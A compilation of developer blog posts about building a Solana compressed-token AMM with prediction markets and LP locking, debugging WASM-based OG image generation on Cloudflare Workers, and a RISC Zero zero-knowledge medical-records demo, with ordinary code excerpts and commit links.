Second: the work is more credible inside a company. When the SDK lands an audit, that audit lands on Zera Labs, not on "some guy with a blog." When the first integration partner asks who's accountable if the prover regresses, the answer is "Zera Labs," not "I'll get to it Tuesday." When a customer asks for a SOC 2, the answer is "we're working on it" instead of laughter. The legal and operational scaffolding is part of the product.

I want to be clear about what I'm *not* claiming. I'm not claiming the team is huge. (`TODO: Dax confirm — keep this hedged until the team page is public.`) I'm not claiming we've raised a round. I'm not claiming we have customers I can name. I am claiming we have a working SDK, a working wallet, a working AMM, a working medical demo, a working devnet, and a Design System we use across the company. The rest is sequencing.

## The animating principle

Every company has one sentence that explains what it is willing to be embarrassed about and what it is willing to be loud about. The one I keep coming back to for Zera Labs is:

> *We build cryptographic infrastructure that is fast enough, cheap enough, and verifiable enough to leave the laboratory. Everything else is taste.*

"Fast enough" is the ZK leg. "Cheap enough" is the Solana / compressed-token leg. "Verifiable enough" is the agentic leg. "Everything else is taste" means the design system, the documentation, the tone of the blog, the choice of dependencies, the way we write commit messages, the way we run incident response. None of those things are in the trade-off space. They are the part where the company has to be the company.

If any of the three legs of the tripod were missing, this would be a research lab or a side project. All three are present. The thing to do, then, is to ship.

## Where to next

If you want the technical receipts:

- [Building the Zera SDK: Day One](/blog/zera_sdk_scaffolding/) — the 14-minute session that put the foundation in.
- [144 Tests and a Surfpool Devnet](/blog/zera_sdk_test_suite/) — the bridge from "the code exists" to "you can use it."
- [ZeraSwap: An AMM for Compressed Tokens](/blog/zeraswap_compressed_amm/) — the bandwidth half.
- [Zera Wallet v3](/blog/zera_wallet_v3_zkp/) — the user-facing half.
- [ZK-FHIR](/blog/zera_med_zk_fhir/) — the proof we can do this for things other than money.

If you want the personal receipts: [Nuclear reactors taught me to ship software](/blog/nuclear_reactors_taught_me_to_ship/) and [What running a Bitcoin mine taught me about cloud margins](/blog/what_running_a_bitcoin_mine_taught_me/) are the two prior chapters. This one is chapter three.

If you want to *use* the work — `dax@skill-issue.dev`. The calendar's [here](https://cal.com/daxts).

That's the founding letter. Now I have to go ship the next thing.


---

# Prediction Markets, LP Locks, and an Admin Page That Doesn’t Suck

Canonical: https://blog.skill-issue.dev/blog/prediction_markets_admin/
Description: How I bolted CPMM prediction markets onto ZeraSwap, locked LP for graduated tokens, and built a 5-tab admin panel before the first malicious actor showed up.
Published: 2026-02-18T19:31:55.000Z
Tags: zera, solana, anchor, prediction-markets, cpmm, admin, governance


A week after [the AMM shipped](/blog/zeraswap_compressed_amm/) I had two open feature requests from people who were actually using it:

1. "I want to bet on whether $TOKEN graduates by Friday."
2. "Why doesn't the launchpad lock LP after graduation? You're going to get rugged."

Both fair. Both were addressed in [`16aa30d` — `Add prediction markets, LP locking, graduation flow, comprehensive admin, and USD pricing`](https://github.com/Dax911/z_trade/commit/16aa30d3ed2f552f743886a647ba1fc7f4773aed) on 2026-02-18. 55 files changed. Let's unpack the parts that actually matter.

## Prediction markets as a CPMM

A prediction market is just a CPMM with two outcome reserves instead of a token + SOL pair. From [`sdk/src/prediction_math.ts`](https://github.com/Dax911/z_trade/blob/16aa30d3ed2f552f743886a647ba1fc7f4773aed/sdk/src/prediction_math.ts):

```ts
// CPMM: shares_out = outcome_reserves * sol_after_fee
//                  / (other_reserves + sol_after_fee)
export function calcBuyOutcome(
  solIn: bigint, yesReserves: bigint, noReserves: bigint,
  outcome: "yes" | "no", feeBps: bigint,
): { sharesOut: bigint; fee: bigint } {
  const fee = (solIn * feeBps) / BPS_DENOMINATOR;
  const solAfterFee = solIn - fee;

  const outcomeReserves = outcome === "yes" ? yesReserves : noReserves;
  const otherReserves   = outcome === "yes" ? noReserves : yesReserves;

  if (outcomeReserves === 0n) return { sharesOut: 0n, fee };

  const sharesOut =
    (outcomeReserves * solAfterFee) / (otherReserves + solAfterFee);
  return { sharesOut, fee };
}

// YES price = no_reserves / (yes_reserves + no_reserves)
export function calcOutcomePrice(yesReserves, noReserves) {
  const total = yesReserves + noReserves;
  if (total === 0n) return { yesPrice: 0.5, noPrice: 0.5 };
  // ...
}
```

The trick is the *price*. In a YES/NO CPMM the price of YES is just the ratio of NO reserves to total reserves. That's because if YES is "expensive" (lots of YES shares already sold), there's less YES reserve left, and the next dollar buys you fewer YES shares. The math is symmetric.

I picked CPMM over LMSR because:

- The LP doesn't need to subsidize liquidity. Whoever creates the market puts up real SOL on both sides and earns the fees.
- It uses literally the same `x*y=k` engine as ZeraSwap's swap path, so I could reuse the slippage and `MathOverflow` checks I'd already debugged.
- Resolution is a single instruction that drains the losing side into the protocol and pays out the winning side proportionally.

Six instructions on-chain: `create_market`, `buy_outcome`, `sell_outcome`, `resolve_market`, `claim_winnings`, `void_market` (plus protocol fee collection). The void path is the safety valve — if the resolution oracle disappears or the market becomes ambiguous, the admin can void and refund pro-rata.

## LP locking: the part that actually makes graduation safe

Before this commit, when a launchpad token graduated to a real ZeraSwap pool, the LP tokens were minted to the launchpad authority and that was that. Nothing stopped the launch creator from yanking liquidity 30 seconds later. Classic rug.

The fix is `LpLock` PDA + `lock_liquidity` and `extend_lock` instructions, and a check in `remove_liquidity` that consults the lock state. Now graduation locks the launch's LP for a configurable window. If you want to be a serious launch, you opt into a longer lock; the frontend surfaces the lock duration as a trust signal on the explore page.

I shipped a related quality-of-life thing the same day in [`a02f672` — `lower graduation to 50 SOL`](https://github.com/Dax911/z_trade/commit/a02f67287a25ef3ce76117d6d592337002cb99a9). 85 SOL was the original threshold and nobody could actually graduate a token at $15K worth of bonding-curve liquidity. 50 SOL turned out to be the floor where a real microcap launch could clear graduation.

## The 5-tab admin page

The same commit ships a five-tab admin panel: `Overview / Launchpad / AMM / Markets / Docs`. The reason this is its own thing is not vanity — it's that a Solana program with five separate config PDAs and three separate fee vaults *cannot be safely operated from a CLI*. You will misread a hex address. You will paste the wrong network. You will pause production thinking it's devnet.

Each tab carries:

- All three vault balances with USD denomination (SOL/USD pulled from CoinGecko via `SolPriceContext` polling).
- "Initialize PDA" buttons for any config that hasn't been bootstrapped on the current cluster.
- Per-launch / pool / market fee collection, plus a "collect all" bulk button.
- The void-market button on the prediction tab, behind a confirm modal, because the void path is irreversible.

I ended up needing this faster than I expected. The very next day I shipped [`557d314` — `Add migrate_config instruction for safe account resizing`](https://github.com/Dax911/z_trade/commit/557d314bd4c9d045823dbd8e6301742338f14ca6) and [`f673b22` — `Add config migration UI to admin page`](https://github.com/Dax911/z_trade/commit/f673b226a34dff77a35ccaf0db1c064112b528fb). The trigger: I'd added a `min_market_liquidity` field to `PredictionConfig` without bumping the account size, and existing configs on devnet couldn't take the update. The admin page detected old-format accounts via a length comparison and surfaced a "Migrate Config" button.

`migrate_config` does what its name says — resizes the account, copies the old data, writes the new field. The trick I missed the first time, fixed in [`6d04415`](https://github.com/Dax911/z_trade/commit/6d044f7efcb3c4debc36fa33d68518748ed04158): when growing a PDA you have to fund the lamport difference via a System Program CPI transfer, not by directly debiting the user's lamports inside the program. Anchor will let you write the second one. The runtime will reject it. Welcome to Solana.

## Trade-offs

**Why CPMM and not parimutuel pools?** Because parimutuel doesn't give you a price until resolution. CPMM lets traders see "YES is at 67¢" continuously. That's the entire UX of a prediction market. If you can't show a price, your users are going to ask why they shouldn't just use Polymarket.

**Why void-market behind admin only?** Because the alternative is "anybody can vote to void a market they're losing" and that destroys the incentive to make confident bets. The market creator stakes the liquidity; the protocol admin holds the void key. The doc tab on the admin panel makes that policy explicit.

**Why an admin page in a "decentralized" project?** Because the project isn't decentralized yet. I'm not going to pretend it is. The admin keys exist; they're documented; they will be migrated to a multisig, and eventually to TW-TVV-style governance ([described in the m0n3y origin post](/blog/m0n3y_naming_a_dream/)). Lying about that today doesn't make it true tomorrow.

## What this taught me

The smart-contract surface of a Solana product compounds non-linearly. ZeraSwap had three PDAs and one fee vault. Adding prediction markets and LP locks brought it to seven PDAs and three fee vaults. The cost of ad-hoc admin tooling exploded. The 5-tab admin page paid for itself in the first hour after deploy when I needed to bulk-collect fees from 12 launches.

## Further reading

- [The full prediction-markets commit](https://github.com/Dax911/z_trade/commit/16aa30d3ed2f552f743886a647ba1fc7f4773aed)
- [`prediction_math.ts`](https://github.com/Dax911/z_trade/blob/16aa30d3ed2f552f743886a647ba1fc7f4773aed/sdk/src/prediction_math.ts)
- [`migrate_config` instruction (the safe-resize fix)](https://github.com/Dax911/z_trade/commit/6d044f7efcb3c4debc36fa33d68518748ed04158)
- [Polymarket](https://polymarket.com/) — the UX target nobody on Solana matches yet
- [LMSR vs CPMM market makers](https://www.eecs.harvard.edu/cs286r/courses/fall12/papers/Hanson_LMSR.pdf) — the paper that justifies LMSR for thin markets


---

# Five Commits to Get an OG Image Out of a Cloudflare Worker

Canonical: https://blog.skill-issue.dev/blog/og_pngs_cf_workers/
Description: A 24-minute slog where I got dynamic OG PNG generation to work on Cloudflare Pages Functions. The bug is WebAssembly. The fix is a build-time WASM import.
Published: 2026-02-15T17:14:55.000Z
Tags: cloudflare, workers, wasm, og-image, svg, solana, devops


The OG image is the thing that decides whether your link gets clicked on Twitter, Discord, or Telegram. If you ship a Solana DEX without per-token OG images, your share buttons are wallpaper. If you ship them as SVG, half the social platforms render them as blank cards because half the social platforms don't render SVG.

So you ship them as PNG. Which means you generate them on the edge. Which means you call into WebAssembly from a Cloudflare Pages Function. Which means [you bang your head against the wall five commits in a row](https://github.com/Dax911/z_trade/commits/main/?after=cb14990c6fadb4abe5e111cd716b3bd08a528ae9+47).

This post is a real-time receipt of that head-banging from 2026-02-15 between 17:03 and 17:30 UTC.

## The problem

The function in question lived at [`functions/og/default.ts`](https://github.com/Dax911/z_trade/blob/962d55c629ce56324bf9cef135d5aeac76f4c2d9/functions/og/default.ts) — a Cloudflare Pages Function that takes a token mint, builds a stylized SVG card with live AMM stats, and converts it to a PNG with [`svg2png-wasm`](https://www.npmjs.com/package/svg2png-wasm). The conversion is the hard part. Everything else is sed-replacing tokens into a template string.

The naive thing is what I shipped first in [1bac3bb — `Convert OG images from SVG to PNG`](https://github.com/Dax911/z_trade/commit/1bac3bbc1173ddf95a964c394858ca7192ce28ac):

```ts
import { initialize, createSvg2png } from "svg2png-wasm";

const wasmRes = await fetch(WASM_URL);
const wasm = await wasmRes.arrayBuffer();
await initialize(wasm);
```

This works locally. This works on Vercel. This does not work on Cloudflare Workers.

## Stage 1: dynamic import → static import (17:03)

[81d3f16 — `Fix OG PNG: use static import for svg2png-wasm instead of dynamic import`](https://github.com/Dax911/z_trade/commit/81d3f16e965ef683dc48c1bb748852c7fcca112c).

CF's bundler doesn't bundle dynamic imports the same way it bundles static imports. Static import. Move on.

## Stage 2: self-fetch → unpkg (17:06)

[e2b0c76 — `Fix OG PNG: fetch WASM from unpkg CDN instead of self-fetch`](https://github.com/Dax911/z_trade/commit/e2b0c76a5e9dea8a425b768fe196a28315d16fa7).

I had been serving the `.wasm` file from `app/public/` and fetching it via `fetch(env.url + "/svg2png_wasm_bg.wasm")`. CF Workers cannot fetch from themselves the way Node servers can — the request loops or 503s depending on the moon phase. I switched to unpkg's CDN. That worked, but introduced a runtime dependency on a third party. We come back to that.

## Stage 3: see the actual error (17:09)

[102f485 — `debug: show OG PNG error details instead of silent fallback`](https://github.com/Dax911/z_trade/commit/102f48575a2bb7cd6fc8e08013d1a6c43cb1f117).

Two hours into a deploy fight and you realize you've been catching the error and rendering the SVG fallback. Take the catch out. Suffer.

The error: `WebAssembly.instantiate() of bytes from request body is not allowed in this Worker`.

CF Workers block `WebAssembly.instantiate()` from raw bytes. Not deprecated. Not slow. Just *blocked*. They want you to use a build-time `import` so the WASM binary becomes a real module they can compile during deploy, not at runtime in your handler. This is a real security stance — they don't want Worker code instantiating arbitrary blobs at runtime — but it's not great when your library (`svg2png-wasm`) is built around a fetch-and-init pattern.

## Stage 4: build-time WASM import (17:12)

[962d55c — `Fix OG PNG: use build-time WASM import for CF Workers compatibility`](https://github.com/Dax911/z_trade/commit/962d55c629ce56324bf9cef135d5aeac76f4c2d9).

This is the actual fix:

```ts
// @ts-ignore — CF Workers WASM import (compiled at build time)
import wasmModule from "./svg2png.wasm";

let svg2pngConverter: Svg2png | null = null;

async function ensureSvg2png(): Promise<Svg2png | null> {
  if (svg2pngConverter) return svg2pngConverter;
  if (!initPromise) {
    initPromise = (async () => {
      await initialize(wasmModule);
      svg2pngConverter = createSvg2png();
    })();
  }
  await initPromise;
  return svg2pngConverter;
}
```

You commit `svg2png.wasm` (~2MB) inside the Functions directory. CF picks it up at deploy time, treats it as a Worker-managed module, and binds the import to a real `WebAssembly.Module`. `initialize(wasmModule)` then takes a `Module` instead of bytes, which is the pre-compiled path that CF allows.

## Stage 5: directory math (17:14)

[9ccab18 — `Fix WASM import path`](https://github.com/Dax911/z_trade/commit/9ccab18e0f7f52d23feadbcac0d8033031c6e848).

The per-token endpoint lives at `functions/og/token/[mint].ts`. The wasm I committed lives at `functions/og/svg2png.wasm`. The relative import was wrong. `../svg2png.wasm`. Done.

## Stage 6: fonts don't ship with the bundle (17:30)

[1c91af7 — `Fix OG images: register Inter + JetBrains Mono fonts for svg2png-wasm`](https://github.com/Dax911/z_trade/commit/1c91af7994df8330f75553a004a3819ce1def75e).

Same idea. `svg2png-wasm` rasterizes text by looking up the font registered in its own runtime, not the host's. The OG card uses Inter and JetBrains Mono. If you don't `registerFont(await loadFontBytes())` for both before calling the converter, your text rasterizes as `□□□□`. Hilarious in test environments. Catastrophic on a public DEX.

## What this actually looked like deployed

The card is a `1200x630` SVG composed inline in TypeScript. The interesting part is the data fetch — I'm pulling live pool reserves from the cached market-data API I'd shipped one commit earlier in [5627d4d — `Add edge-cached market data API`](https://github.com/Dax911/z_trade/commit/5627d4d099cff09e708e01ae0a0c77248d714e5f), so the OG card always reflects the *current* price, capped to the cache TTL. That's the entire reason this had to live on the edge: a static image generated at build time would show stale prices forever.

## Trade-offs

**Why not use [`@vercel/og`](https://vercel.com/docs/functions/og-image-generation)?** Because we're on CF Pages, and Vercel's OG library is bound to React + Satori in a way that's genuinely hard to extract. `svg2png-wasm` is 4 dependencies and one WASM file. The cost of "just write the SVG yourself" turned out to be lower than I expected.

**Why commit the wasm file to git?** It's 2MB. My repo is not a museum. I'd rather have a deterministic deploy that doesn't depend on unpkg being up.

**Why not pre-render on cron and serve static PNGs?** Because there are 50+ tokens at any given moment, and pre-rendering all of them on a cron is busywork that wastes cycles 99.9% of the time. The right shape is "render on cache miss, serve from cache for 24h." Which is what shipped.

## What this taught me

Cloudflare's WASM contract is *real* and you cannot work around it. The error message is clear once you stop swallowing it. The ecosystem of WASM libraries is mostly written assuming Node-style runtime fetch, so half of the porting work is going to be "convince this library to take a `WebAssembly.Module` instead of a `BufferSource`." Some libraries refuse to accept that as a PR; in those cases you write a thin wrapper or you fork.

Five commits in 24 minutes is not a flex. It's a confession that the only way I could solve this was to ship to production and let the runtime tell me what was wrong, because there is no other place that runs this stack the way Cloudflare does. CI didn't catch it. Local `wrangler pages dev` didn't catch it. Production caught it in 30 seconds.

## Further reading

- [Cloudflare Workers — WebAssembly modules](https://developers.cloudflare.com/workers/runtime-apis/webassembly/)
- [`svg2png-wasm` on npm](https://www.npmjs.com/package/svg2png-wasm)
- [The full sequence of commits on z_trade between 17:03–17:30 UTC](https://github.com/Dax911/z_trade/commits/main/?since=2026-02-15)
- [ZeraSwap origin post](/blog/zeraswap_compressed_amm/) — the project this OG card is for.


---

# ZeraSwap: An AMM for Compressed Tokens

Canonical: https://blog.skill-issue.dev/blog/zeraswap_compressed_amm/
Description: Initial commit of the first compressed-token AMM on Solana — Anchor program, x*y=k math, SOL/cToken pairs, and the cyberpunk launchpad UI that grew up around it.
Published: 2026-02-10T21:03:36.000Z
Tags: zera, solana, anchor, amm, light-protocol, compressed-tokens, rust


> "Initial ZeraSwap: compressed token AMM for Solana"

That's the [first commit on z_trade](https://github.com/Dax911/z_trade/commit/b088fe8bf3eb8c1047712abb53d865fd3ac93db3), dropped at 2026-02-10T21:03:36Z. It's also, as far as I'm aware, the first AMM where the token side of every pool is a Light Protocol compressed token instead of an SPL token. That's not an accident; that's the entire pitch.

Solana compressed tokens (`@lightprotocol/compressed-token`) cost roughly 1/5000th of SPL tokens to mint and transfer at scale, because the account state lives in a Merkle tree off-chain instead of a 175-byte SPL account on-chain. That's incredible for token launches, terrible for AMMs — because every existing AMM expects to hold token accounts. So if you want compressed tokens to actually be useful as economic objects, you need an AMM that natively takes them.

## The Anchor program

Seven instructions. From [`programs/zeraswap/src/lib.rs`](https://github.com/Dax911/z_trade/blob/b088fe8bf3eb8c1047712abb53d865fd3ac93db3/programs/zeraswap/src/lib.rs):

```rust
#[program]
pub mod zeraswap {
    use super::*;
    pub fn initialize_protocol(ctx, fee_recipient, lp_fee_bps, protocol_fee_bps) -> Result<()> { ... }
    pub fn create_pool(ctx, initial_sol, initial_tokens) -> Result<()> { ... }
    pub fn add_liquidity(ctx, sol_amount, token_amount, min_lp_out) -> Result<()> { ... }
    pub fn remove_liquidity(ctx, lp_amount, min_sol_out, min_tokens_out) -> Result<()> { ... }
    pub fn swap_sol_for_tokens(ctx, sol_in, min_tokens_out) -> Result<()> { ... }
    pub fn swap_tokens_for_sol(ctx, tokens_in, min_sol_out) -> Result<()> { ... }
    pub fn collect_fees(ctx) -> Result<()> { ... }
}
```

Constants ([`constants.rs`](https://github.com/Dax911/z_trade/blob/b088fe8bf3eb8c1047712abb53d865fd3ac93db3/programs/zeraswap/src/constants.rs)):

```rust
pub const DEFAULT_LP_FEE_BPS: u16 = 20;       // 0.20%
pub const DEFAULT_PROTOCOL_FEE_BPS: u16 = 5;  // 0.05%
pub const MAX_FEE_BPS: u16 = 1000;            // 10% max total
pub const MINIMUM_LIQUIDITY: u64 = 1_000;     // locked forever on first deposit
pub const MINIMUM_SOL_RESERVES: u64 = 10_000; // 0.00001 SOL
```

The math is `x*y=k`, the same constant-product curve Uniswap v1 shipped in 2018. There's a reason every L1 AMM eventually defaults to this: it has no edge cases that you find in production. From [`instructions/swap.rs`](https://github.com/Dax911/z_trade/blob/b088fe8bf3eb8c1047712abb53d865fd3ac93db3/programs/zeraswap/src/instructions/swap.rs):

```rust
// Constant product:
// tokens_out = token_reserves * sol_in_after_fee
//            / (sol_reserves + sol_in_after_fee)
let tokens_out = (pool.token_reserves as u128)
    .checked_mul(sol_in_after_fee as u128)?
    .checked_div(
        (pool.sol_reserves as u128).checked_add(sol_in_after_fee as u128)?,
    )? as u64;

require!(tokens_out >= min_tokens_out, ZeraSwapError::SlippageExceeded);
require!(tokens_out < pool.token_reserves, ZeraSwapError::ReservesDrained);
```

I wrote it `u128`-promoted for the multiply, then cast back to `u64` after the divide, because `u64 * u64` overflows roughly the moment any pool gets serious volume. Nothing exciting; just the kind of detail that bites you exactly once.

## What's *actually* novel

The thing I had to figure out wasn't the curve. It was state trees. Each pool gets its own `state_tree: Pubkey` field in the [`Pool`](https://github.com/Dax911/z_trade/blob/b088fe8bf3eb8c1047712abb53d865fd3ac93db3/programs/zeraswap/src/state.rs) struct:

```rust
#[account]
pub struct Pool {
    pub token_mint: Pubkey,
    pub lp_mint: Pubkey,
    pub sol_vault: Pubkey,
    /// Dedicated state tree for this pool's compressed token operations
    pub state_tree: Pubkey,
    pub sol_reserves: u64,
    pub token_reserves: u64,
    pub lp_supply: u64,
    // ...
}
```

Light Protocol's compressed token operations need an explicit `state_tree` reference. If you forget that, the compress/decompress CPI just silently lands the tokens in someone else's tree, and your pool can never reconstruct them. Five days of staring at logs taught me to put `state_tree` directly on the `Pool` account at creation time and never touch it again.

## Five days later: the cyberpunk launchpad

The next major commit is [b6b6fa5 — `Add shared AMM vault, launchpad, pools, transfers, cyberpunk UI`](https://github.com/Dax911/z_trade/commit/b6b6fa50c6f9678f69375067b33379d99feeff49) on 2026-02-15. This is where the AMM stopped being a barebones swap and started being a launchpad — bonding curves, internal `UserPosition.token_balance` accounting, a graduation flow at 50 SOL of bonding-curve liquidity, and the cyan/purple cyberpunk frontend that ended up being the project's identity.

The launchpad is conceptually a separate Anchor program that buys/sells against a virtual reserve (think pump.fun) until a token "graduates" to a real ZeraSwap AMM pool. The curve uses a base reserve to bootstrap price discovery. From the same day, I shipped both [`f3f71f3` and `d01b4683`](https://github.com/Dax911/z_trade/commit/d01b4683d109af3dc58f48aaf7344d463700de55) lowering graduation from 85 → 50 SOL after the first paper trade made it obvious 85 was too high — nobody graduates a token if they need to spend $15K to do it.

## The quality-of-life shift

The most under-appreciated commit of that February sprint is [cb14990 — `Fix RPC spam: pause polling on hidden tabs`](https://github.com/Dax911/z_trade/commit/cb14990c6fadb4abe5e111cd716b3bd08a528ae9). The whole repo had been making 46–94 RPC calls/min to Helius. New worst case after the fix: 12 calls/min on the active tab, 0 on hidden tabs. The hook is six lines of meaningful code:

```ts
// app/src/hooks/useVisibleInterval.ts
function onVisibilityChange() {
  if (document.hidden) {
    stop();
  } else {
    savedCallback.current(); // fire immediately on re-show
    start();
  }
}
document.addEventListener("visibilitychange", onVisibilityChange);
```

A free tier of Helius is 100k calls/day. A tab open for 24 hours at 94 calls/min burns through that in 18 hours. This bug was costing me real money. The fix shipped 12 days into the project.

## Trade-offs

**Why not use an existing AMM SDK?** Because none of them know what to do with `@lightprotocol/compressed-token`. Orca, Raydium, Meteora — every one of them assumes SPL token accounts. By the time you've patched their account derivation, you've written your own program anyway.

**Why x\*y=k instead of concentrated liquidity?** Because the AMM is a graduation target for the launchpad, not a yield-farming venue. The launch flow guarantees pools start with deep, balanced reserves. Concentrated liquidity in that environment is just a way to price-impact yourself. If somebody serious comes along and wants to bring real liquidity, they can fork the program; the math is 30 lines.

**Why two fees (LP + protocol)?** Because I don't trust myself to skim the protocol fee out of LP revenue post-hoc. Putting the protocol fee on a separate counter from the start was cheap then and saved me a `migrate_config` ([`6d04415`](https://github.com/Dax911/z_trade/commit/6d044f7efcb3c4debc36fa33d68518748ed04158)) later — well, *almost* saved me. We'll get to that.

## What this taught me

Compressed tokens are an unfair advantage for whoever ships first, because the entire DEX ecosystem on Solana is built on the assumption that "token" = "SPL Token Account." Light Protocol changed that assumption. The block of code most people miss is keeping a `state_tree` field on every pool — once you've done that, everything else is x\*y=k and being kind to your RPC provider.

## Further reading

- [z_trade on GitHub](https://github.com/Dax911/z_trade)
- [Initial ZeraSwap commit](https://github.com/Dax911/z_trade/commit/b088fe8bf3eb8c1047712abb53d865fd3ac93db3)
- [Light Protocol — compressed tokens](https://www.lightprotocol.com/)
- ["Building A Better Cryptocurrency"](/blog/a_better_crypto/) — the stance on protocol-level fee design that informed `MAX_FEE_BPS = 1000`.
- [Stuck Sell, Post-Graduation](/blog/stuck_sell_post_grad/) — the bug this design eventually wrote me a check for.


---

# ZK-FHIR: A Medical Demo That Doesn’t Leak Patients

Canonical: https://blog.skill-issue.dev/blog/zera_med_zk_fhir/
Description: Building a RISC Zero zkVM gateway for FHIR-shaped medical records — proofs over private patient data, zero-knowledge insurance claims, and HIV/STI compartmentalization.
Published: 2026-02-11T06:29:06.000Z
Tags: zera, zk, risc-zero, fhir, healthcare, privacy, cloudflare-pages


The whole `zera_med_demo` repo exists because someone asked me, "if your privacy chain is real, prove it works for something other than crypto bros." Fair. So I spent a weekend building a working RISC Zero zkVM gateway for FHIR-shaped medical records. The MVP shipped at [commit 8ae0a7a — `Zera Medical ZK-FHIR Gateway MVP`](https://github.com/Dax911/zera_med_demo/commit/8ae0a7a64096376893206187e61e2c9f295a9050) on 2026-02-11.

Full-stack: React frontend, Express + SQLite backend, real RISC Zero zkVM in `zkvm/`. Nine proof operations, every one of them running through an actual guest program — none of this "we'll mock the proof" demo nonsense.

## The shape of the problem

FHIR is healthcare's answer to "data interoperability." The thing FHIR does not do is privacy. If a hospital sends FHIR records to an insurer to back a claim, the insurer learns the entire record. If a researcher queries an aggregate, the institution sending data has to trust the researcher's de-identification.

ZK lets you flip that. The prover holds the private record. The verifier learns only what the proof's public outputs reveal. Everything else stays on the prover's side of the airgap.

The MVP defined nine operations, each with a strict private/public split:

```rust
// zkvm/methods/guest/src/main.rs
match operation.as_str() {
    "record_commit"      => run_record_commit(),
    "access_verify"      => run_access_verify(),
    "aggregate_query"    => run_aggregate_query(),
    "insurance_claim"    => run_insurance_claim(),
    "consent_grant"      => run_consent_grant(),
    "consent_revoke"     => run_consent_revoke(),
    "emergency_access"   => run_emergency_access(),
    "prior_auth"         => run_prior_auth(),
    "compliance_audit"   => run_compliance_audit(),
    _ => panic!("Unknown operation: {}", operation),
}
```

The model: every guest reads private inputs (the patient record, the credential, the consent), commits exactly the public outputs the use case needs, and nothing else. `record_commit` for example is just a content-addressed handle — the journal carries `commitment_hash`, `patient_id_hash`, `record_type`, `resource_count`, `data_hash`. The actual conditions and observations never leave the prover.

## `access_verify`: the boring proof that justifies the whole thing

If you only have the patience for one operation, it's this one. Doctor wants to read patient X. The hospital has a credential, the patient has signed a consent, and someone has to verify — without revealing the contents of the record — that the access was valid. From [`zkvm/methods/guest/src/main.rs`](https://github.com/Dax911/zera_med_demo/blob/8ae0a7a64096376893206187e61e2c9f295a9050/zkvm/methods/guest/src/main.rs):

```rust
let credential_valid = !input.credential.role.is_empty()
    && !input.credential.institution.is_empty()
    && input.credential.valid_until >= input.current_timestamp;

let consent_valid = input.consent.grantee_id == input.credential.accessor_id
    && input.consent.purpose == input.purpose
    && input.consent.valid_from <= input.current_timestamp
    && input.consent.valid_until >= input.current_timestamp;

let authorized = credential_valid && consent_valid;
```

Boring. That's the point. The boring part is the predicate. The interesting part is that `input.patient_record` — which the predicate doesn't even read — never leaves the zkVM. The verifier learns:

- Was access authorized? (a single bit)
- What role accessed it? (`Doctor`, `Researcher`, `Insurer`)
- A nullifier:
    ```rust
    let mut nullifier_hasher = Sha256::new();
    nullifier_hasher.update(&input.credential.accessor_id);
    nullifier_hasher.update(&record_hash);
    nullifier_hasher.update(&input.current_timestamp);
    let nullifier = hex::encode(nullifier_hasher.finalize());
    ```

The nullifier prevents the same access from being double-counted in audits. The record hash binds the access to a specific record without revealing it. That's the whole shape of every other operation in the demo.

## The detour: insurance claims that compartmentalize by carrier

The next interesting commit is [c65cab8 — `Add ZKP visualization modal, HIV/STI data, insurer selectors`](https://github.com/Dax911/zera_med_demo/commit/c65cab8954ddc0a3ba7b308a58b36078497d34f9) on 2026-02-11. Three things landed at once:

1. **The ZK proof modal** — a full-screen animated panel that walks the user through `Private Data → RISC Zero zkVM → Proof Output`, with a comparison panel showing what the verifier sees vs. what the prover holds. Educational. People who've never touched a Groth16 receipt before will sit through 90 seconds of animation if it's pretty.
2. **HIV/STI data**. ICD-10 codes B20 (HIV disease), Z21 (asymptomatic HIV), Hep B/C, syphilis, gonorrhea, chlamydia, herpes, HPV. Plus viral load, CD4, PCR observations. ARVs: Biktarvy, Triumeq, Descovy PrEP. This is the data category that destroys lives when it leaks. So obviously this is the category the demo has to handle, or the demo is decorative.
3. **Insurer compartmentalization**. Each insurer's view is filtered to its own members. Aetna users don't see UnitedHealth records. The demo enforces this in the SQLite layer, but the ZK guest enforces it cryptographically — `insurance_claim` commits the insurer's identity in the journal, and the seed data is stamped with insurer membership.

This isn't theoretical. Compartmentalization is the only reason this kind of demo isn't a HIPAA disaster waiting to happen.

## Cloudflare Pages: the dumb part of any full-stack demo

Three of the six commits in the repo are deploy fixes. [c59509d — `Fix Cloudflare build: track src/data/types.ts`](https://github.com/Dax911/zera_med_demo/commit/c59509d3a6419944cb60cf6b1758dddc6f98b791), [2efff06 — `Add missing HospitalResult type`](https://github.com/Dax911/zera_med_demo/commit/2efff06c6d21c4a38fcb97d509a5b08bae5c039f), [1d0c2e2 — `Add wrangler.jsonc for Cloudflare Pages static asset deploy`](https://github.com/Dax911/zera_med_demo/commit/1d0c2e28a3c6a09381632cd9c6ca8155a6515d39).

This is the part of every demo nobody writes about. You build a beautiful zk pipeline, you ship it to a static host, the host's build environment doesn't have a TypeScript file you forgot to track, and three commits later your gitignore is shorter and you've learned not to put `src/data/types.ts` in `.gitignore`. Real life.

## What this taught me

The fact that I had to ship the *demo* before anyone took the privacy claim seriously is a recurring theme. People do not believe a chain is private because the white paper says so. They believe it because they can click a button labeled "Run Insurance Claim Proof" and watch the modal split private inputs from public outputs in real time. That modal is the most expensive component in the repo. It is also the only one that materially changed how the demo lands.

The other thing this taught me: RISC Zero is unreasonably good for "let me prove a JavaScript-like predicate over JSON-shaped private data without learning to write Circom." The guest is just Rust. The verifier is a single library call. If your team's bottleneck is "we can't hire a circuit engineer for one demo," reach for a zkVM before you reach for snarkjs.

## Further reading

- [zera_med_demo on GitHub](https://github.com/Dax911/zera_med_demo) — the whole repo.
- [Initial MVP commit](https://github.com/Dax911/zera_med_demo/commit/8ae0a7a64096376893206187e61e2c9f295a9050) — full guest + host implementation.
- [RISC Zero zkVM docs](https://dev.risczero.com/) — what `env::commit` actually does.
- [HL7 FHIR spec](https://www.hl7.org/fhir/) — the data shape this demo is hiding.
- [Building A Better Cryptocurrency](/blog/a_better_crypto/) — same privacy thesis, different vertical.


---

# A Privacy Demo That Works on a Phone: Mobile Drawer, HUD Offsets, and Real Breach Data

Canonical: https://blog.skill-issue.dev/blog/zera_med_responsive_hud/
Description: Bolting a mobile drawer onto the Zera Med ZK-FHIR demo without breaking the desktop sidebar, fixing AnimatePresence warnings, and updating PrivacyChallenge with 2024-2025 breach data.
Published: 2026-02-11T22:48:22.000Z
Tags: zera-med, react, tailwind, responsive, accessibility, framer-motion, demo


The unspoken rule of demo apps is that they're built for laptops. You'd never demo a healthcare privacy product from a phone. You'd plug the laptop into a projector and run it from a 13" screen. Real users wouldn't be on a phone, the dataset has columns that don't fit on mobile, and you've shipped a desktop-only experience without thinking about it.

